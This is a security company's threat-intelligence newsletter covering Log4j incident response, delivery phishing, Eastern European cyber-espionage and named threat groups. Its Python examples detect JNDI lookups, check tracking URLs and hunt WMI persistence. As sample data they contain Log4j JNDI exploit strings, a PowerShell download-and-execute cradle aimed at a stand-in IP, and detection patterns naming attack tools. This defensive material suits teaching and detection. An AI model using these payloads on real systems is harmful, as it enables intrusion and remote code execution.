Log4j, Log4j and more Log4j! If anything, the month of January has taught us that even a vulnerability that is trivial to exploit can cause absolute havoc for organisations. The main reasons it was exploited so successfully were, firstly, that Log4j (the Apache Software Foundation's Java logging library, not to be confused with the Apache web server) is embedded in a huge number of Java applications and appliances, and secondly, that many of those applications are Internet facing, so the exploit string could be delivered in any request field that ends up being logged. Luckily for us in the Integrity360 Cyber Threat Response team, it was quite simple to detect successful executions from the local web and application logs on the affected servers and progress the investigation from there.
However, we did have one incident where an attacker had attempted to clear the logs. They weren't very smart about it: they only removed the log entries covering the exploit, so the obvious gap in otherwise steady traffic gave us the initial access timestamp. In terms of successful lateral movement from the exploited web servers, the more severe incidents tended to happen at customers that had not properly segmented their networks. Proper DMZ segregation is an absolute must for organisations that host external web servers. It also goes without saying (we have to say it unfortunately) that your backend database should not be on the same server as your website front end, let alone on the same network!
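To make the two detection ideas above concrete (spotting the JNDI lookup string in local logs, and dating an intrusion from a hole in tampered logs), here is an added Python example that is not part of the original newsletter and not Integrity360 tooling. It parses Apache-style combined log lines, normalises the ${lower:} and ${::-} nesting tricks attackers used to evade naive ${jndi: matching, and flags gaps in otherwise steady traffic. The log lines, IP addresses and the five-minute gap threshold are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache-style combined log lines (not real customer data). Two requests from
# 198.51.100.7 carry a JNDI lookup: one plain, one using the ${lower:} nesting bypass.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Dec/2021:09:14:00 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
192.0.2.10 - - [12/Dec/2021:09:14:30 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
198.51.100.7 - - [12/Dec/2021:09:14:41 +0000] "GET /app/login HTTP/1.1" 200 2048 "-" "${jndi:ldap://198.51.100.7:1389/a}"
198.51.100.7 - - [12/Dec/2021:09:14:43 +0000] "GET /app/login?u=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a} HTTP/1.1" 200 2048 "-" "curl/7.68.0"
192.0.2.10 - - [12/Dec/2021:09:15:00 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
192.0.2.10 - - [12/Dec/2021:09:15:30 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
"""

# Constructed "tampered" log: the attacker deleted the window around the exploit, so there is
# no JNDI string left, but a 26-minute hole in a health check that otherwise fires every 30s.
TAMPERED_LOG = """\
192.0.2.10 - - [12/Dec/2021:09:14:00 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
192.0.2.10 - - [12/Dec/2021:09:14:30 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
192.0.2.10 - - [12/Dec/2021:09:41:00 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
192.0.2.10 - - [12/Dec/2021:09:41:30 +0000] "GET /health HTTP/1.1" 200 15 "-" "kube-probe/1.22"
"""

_CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                  r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Nested-lookup bypasses seen in the wild: ${lower:x} / ${upper:x} -> x, ${anything:-x} -> x
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")


def parse_line(line):
    """Return the fields of one combined-log line as a dict, or None if it does not parse."""
    m = _CLF.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def normalise_lookups(value, max_rounds=10):
    """Collapse nested Log4j lookups until nothing changes, then lower-case the result."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), value)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value.lower()


def is_jndi_lookup(value):
    return "${jndi:" in normalise_lookups(value)


def find_jndi_hits(lines):
    """JNDI lookups in the request line, Referer or User-Agent, with source IP and time."""
    hits = []
    for entry in map(parse_line, lines):
        if not entry:
            continue
        for field in ("req", "ref", "ua"):
            if is_jndi_lookup(entry[field]):
                hits.append({"ts": entry["ts"], "ip": entry["ip"], "field": field})
    return hits


def find_log_gaps(lines, threshold=timedelta(minutes=5)):
    """Consecutive timestamps further apart than threshold: candidate log-wiping windows."""
    stamps = sorted(e["ts"] for e in map(parse_line, lines) if e)
    return [(a, b) for a, b in zip(stamps, stamps[1:]) if b - a > threshold]


if __name__ == "__main__":
    for h in find_jndi_hits(SAMPLE_LOG.splitlines()):
        print(f"JNDI lookup from {h['ip']} at {h['ts']:%Y-%m-%d %H:%M:%S} in {h['field']}")
    for a, b in find_log_gaps(TAMPERED_LOG.splitlines()):
        print(f"Unexplained gap {a:%H:%M:%S} -> {b:%H:%M:%S} ({b - a})")
```

Run it over the real access log and over the Java application's own log where request headers are echoed; the gap check only works against a baseline of regular traffic (health checks, monitoring), so pick the threshold from the normal interval on that host rather than a fixed value.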
In other news, we have seen a big shift in the topics of social engineering and phishing emails from COVID-19 to delivery company emails. As I type this, 27 of the last 100 spam emails I have received claim to be delivery notifications from DHL. With most things being ordered online these days, we can only see this rising. The problem is that organisations such as banks can tell customers that they never send texts or emails asking them to log in (which is true), but delivery companies such as DHL use texts and emails as their primary method of sending the customer their tracking URL and updates. We urge all recipients of potential delivery emails and texts to always double check that the tracking URL is on the official domain of the delivery company, not merely that the company's name appears somewhere in the link. Of course, if you aren't expecting a delivery then why open it in the first place!?
As tensions rise in eastern Europe between Ukraine and Russia, we expect to see a huge rise in cyber-espionage in the region. As a result, we have been providing several consultations for organisations that have offices or other locations there. One of the most effective ways to destabilise a country is by attacking its IT infrastructure. We will most likely have more on this next month, while we monitor the situation closely.
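Returning to the delivery-phishing advice above: as an added example that is not from the original newsletter, here is the tracking-URL check in Python. It demonstrates the three tricks a naive "does the link contain dhl.com?" test misses: the official name used as a subdomain of an attacker-controlled domain, the official name placed before an @ so the real host is something else entirely, and internationalised (punycode) look-alike hostnames. The allow-list of official domains is an assumption for the example; take it from the courier's own site, never from the message being checked.

```python
from urllib.parse import urlsplit

# Official courier domains: an ASSUMPTION for this example. Populate it from the courier's
# own published domains, never from the email or text message you are checking.
OFFICIAL_DOMAINS = {"dhl.com", "dhl.co.uk"}


def belongs_to(hostname, domain):
    """True only if hostname IS the domain or a genuine subdomain of it.
    'dhl.com.parcel-update.example' satisfies neither, so it is rejected."""
    return hostname == domain or hostname.endswith("." + domain)


def check_tracking_url(url, official_domains=OFFICIAL_DOMAINS):
    """Return (ok, reason). Fails closed: anything not provably official is rejected."""
    parts = urlsplit(url.strip())
    # .hostname is lower-cased with port and userinfo stripped; drop a trailing root dot
    host = (parts.hostname or "").rstrip(".")
    if parts.scheme not in ("http", "https") or not host:
        return False, "not an http(s) URL"
    if parts.username is not None:
        # https://dhl.com@198.51.100.7/ : the text before '@' is userinfo, the real host follows it
        return False, f"userinfo hides the real host ({host})"
    if not host.isascii() or "xn--" in host:
        # internationalised domain name, either raw Unicode or already punycode-encoded
        return False, f"internationalised hostname, possible look-alike: {host}"
    if parts.scheme != "https":
        return False, "plain http: couriers serve tracking pages over https"
    for domain in official_domains:
        if belongs_to(host, domain):
            return True, f"{host} is under official domain {domain}"
    return False, f"{host} is not under any official domain"


if __name__ == "__main__":
    # Constructed sample links of the kind seen in delivery-themed phishing.
    for link in (
        "https://www.dhl.com/gb-en/home/tracking.html?tracking-id=1234567890",
        "https://dhl.com.parcel-update.example/track?id=1234567890",
        "https://dhl.com@198.51.100.7/track",
        "https://www.xn--dh-gba.com/track",
        "http://www.dhl.com/track",
    ):
        ok, reason = check_tracking_url(link)
        print("OK   " if ok else "BLOCK", link, "->", reason)
```

Text messages usually carry a shortened link; expand it first (the function rejects the shortener's own host, which is the safe default) and check the final destination.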
As mentioned in the introductory note, cyber-espionage in Eastern Europe is on the rise. Ukraine was recently hit by a large-scale cyber-attack that took down several government and ministry websites. Threat actors defaced the Ministry of Foreign Affairs website with a threatening message reading “Ukrainians!… All information about you has become public, be afraid and expect worse.”
Researchers additionally found evidence of destructive malware disguised as ransomware that renders a system inoperable. It presents itself like ransomware, except that no recoverable key exists, so the data cannot be restored even if the victim wanted to pay. This points to disruption rather than financial gain as the goal.
Threat actors closely linked to Russian intelligence services have been identified deploying a previously unknown, stealthy malware family named TrailBlazer. It has been in use since mid-2019 but remained undetected until recently. The malware is largely fileless and uses Windows Management Instrumentation (WMI) permanent event subscriptions for persistence, a technique that was unusual in 2019. Its command-and-control (C2) traffic is disguised as legitimate Google Notifications HTTP requests, and the C2 infrastructure likely included compromised hosts.
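The WMI persistence technique above is worth hunting for on your own estate. The following is an added Python example (not from the original newsletter, nor CrowdStrike's or Integrity360's tooling) that triages permanent WMI event subscriptions. Each subscription is an __EventFilter (a WQL query saying when to fire), an __EventConsumer (what to run) and a __FilterToConsumerBinding joining them, all in the root\subscription namespace; on Windows you can export them with Get-CimInstance -Namespace root/subscription, or see them created as Sysmon event IDs 19, 20 and 21. The records below are constructed, simplified dictionaries rather than real CIM objects, and the field names (Name, Query, Type, Command, Filter, Consumer) are assumptions for the example. The code also decodes a PowerShell -EncodedCommand payload so the indicators hidden inside it become visible, and it includes the benign SCM Event Log subscription present on default Windows installs to show why triage keys on the consumer class rather than on the filter query.

```python
import base64
import re

# A PowerShell payload of the kind a CommandLineEventConsumer launches, encoded the way
# powershell.exe -EncodedCommand expects (base64 of UTF-16LE). Constructed for the example.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed, simplified records of the three object classes in root\subscription.
# Field names are assumptions for this example, not the CIM or Sysmon schema.
FILTERS = [
    {"Name": "SCM Event Log Filter",   # benign default subscription shipped with Windows
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 "
              "AND TargetInstance.SystemUpTime < 325"},
    {"Name": "BVTFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200"},
    {"Name": "Updater",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA "
              "'Win32_LocalTime' AND TargetInstance.Hour = 3"},
]
CONSUMERS = [
    {"Name": "SCM Event Log Consumer", "Type": "NTEventLogEventConsumer", "Command": ""},
    {"Name": "BVTConsumer", "Type": "CommandLineEventConsumer",
     "Command": f"powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENC}"},
    {"Name": "Updater", "Type": "ActiveScriptEventConsumer",
     "Command": "var sh = new ActiveXObject('WScript.Shell'); sh.Run('cmd /c C:/Users/Public/u.exe', 0);"},
]
BINDINGS = [
    {"Filter": "SCM Event Log Filter", "Consumer": "SCM Event Log Consumer"},
    {"Filter": "BVTFilter", "Consumer": "BVTConsumer"},
    {"Filter": "Updater", "Consumer": "Updater"},
]

# Consumer classes that execute arbitrary code; the log/SMTP consumers only write events.
CODE_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# -e, -ec, -en, -enc ... -encodedcommand, but not -ex/-ep (ExecutionPolicy)
_ENC_ARG = re.compile(r"-(?:e|ec|en[codema]*)\s+([A-Za-z0-9+/=]+)", re.I)
_SUSPICIOUS = re.compile(
    r"powershell|pwsh|-nop|-enc|hidden|\biex\b|invoke-expression|downloadstring|webclient"
    r"|cmd(?:\.exe)?\s*/c|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin", re.I)
_TRIGGER = re.compile(r"SystemUpTime|Win32_LocalTime|__InstanceModificationEvent", re.I)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    m = _ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_wmi_subscriptions(filters, consumers, bindings):
    """Walk every filter->consumer binding and return the ones worth an analyst's time."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {c["Name"]: c for c in consumers}
    findings = []
    for b in bindings:
        flt = by_filter.get(b["Filter"], {})
        con = by_consumer.get(b["Consumer"], {})
        command = con.get("Command", "")
        decoded = decode_encoded_command(command)
        reasons = []
        if con.get("Type") in CODE_CONSUMERS:
            reasons.append(f"{con['Type']} runs attacker-supplied code")
        # score the visible command plus the decoded payload, not the opaque base64 blob
        visible = _ENC_ARG.sub("-enc <base64>", command) + " " + (decoded or "")
        hits = sorted({h.lower() for h in _SUSPICIOUS.findall(visible)})
        if hits:
            reasons.append("command indicators: " + ", ".join(hits))
        # a boot/timer trigger alone is not evidence (the benign SCM filter has one);
        # it only strengthens a finding that already has a code-running consumer
        if reasons and _TRIGGER.search(flt.get("Query", "")):
            reasons.append("filter fires on boot or a timer, typical of persistence")
        if reasons:
            findings.append({"filter": b["Filter"], "consumer": b["Consumer"],
                             "reasons": reasons, "decoded_command": decoded})
    return findings


if __name__ == "__main__":
    for f in hunt_wmi_subscriptions(FILTERS, CONSUMERS, BINDINGS):
        print(f"[!] {f['filter']} -> {f['consumer']}")
        for r in f["reasons"]:
            print("    -", r)
        if f["decoded_command"]:
            print("    decoded:", f["decoded_command"])
```

Note that the malicious BVTFilter query is almost identical to the benign SCM one; it is the CommandLineEventConsumer and what it runs that separate them, which is why a hunt that only greps filter queries for SystemUpTime produces noise.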
One of our red team's favourite stories is the one where an analyst disguised himself in a pizza delivery uniform and craftily dropped a few USB drives around the company he was “delivering to”. Multiple high-ranking employees plugged them in, resulting in a full compromise of the organisation.
FIN7, a financially motivated threat group, has recently been mailing malicious USB devices through the US Postal Service, hoping to infect organisations in the transportation, insurance and defence industries. Once plugged in, the device performs a BadUSB attack: it presents itself as a keyboard and injects keystrokes that run PowerShell commands for further exploitation, so USB storage blocking alone does not stop it.
In early January, US Cyber Command released details of multiple open-source tools used by the Iran-linked advanced persistent threat (APT) group MuddyWater. The group has reportedly used DLL side-loading to trick legitimate programs into loading and running its malware, and obfuscated PowerShell scripts to hide malicious command-and-control functions. MuddyWater has been assessed to be part of the Iranian Ministry of Intelligence and Security and conducts domestic and overseas surveillance in the oil, gas and telecommunications sectors.
In early January, the FSB conducted a series of raids resulting in the arrest of several members of the Russia-based REvil ransomware gang. The FSB reported that the arrests were carried out at the request of the US, and that the detainees had been charged with “illegal turnover of means of payments.” According to the FSB, the following was seized:
- More than RUB 426 million in fiat and cryptocurrency
- More than USD 600,000
- More than EUR 500,000
- Cryptocurrency wallets
- 20 cars
- Computer equipment
In addition, the FSB claimed to have “neutralized” REvil’s online infrastructure. Fourteen individuals were arrested initially, with a further six arrested later.
The Vietnamese trading platform ONUS was the victim of a ransomware attack that leveraged the Log4j flaw in its payment system. The criminals demanded a USD 5 million ransom in a double extortion scheme. ONUS refused to pay, so the threat actors put the records of 2 million ONUS customers up for sale.
A new UEFI firmware-level rootkit dubbed MoonBounce has been deployed by the Chinese-speaking group APT41, also known as Winnti. Researchers found that the implant is used to stage user-mode malware, which in turn executes further payloads fetched from the internet. Because the implant lives in firmware rather than on disk, reinstalling the operating system or replacing the drive does not remove it.
While a minority of organisations are still cleaning up from the Log4j mess of December and early January, we would say most are now comfortable defending against Log4j exploits as we progress into February. Some of the best advice we can give is that just because no alarms were tripped does not mean that a compromise did not take place.
In our experience, attackers can remain dormant in victims’ networks for many months, even years, before becoming active. It is also becoming increasingly common for attackers to specialise in one stage of the breach (e.g. initial access) and then sell that access to another group, who delivers the payload.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.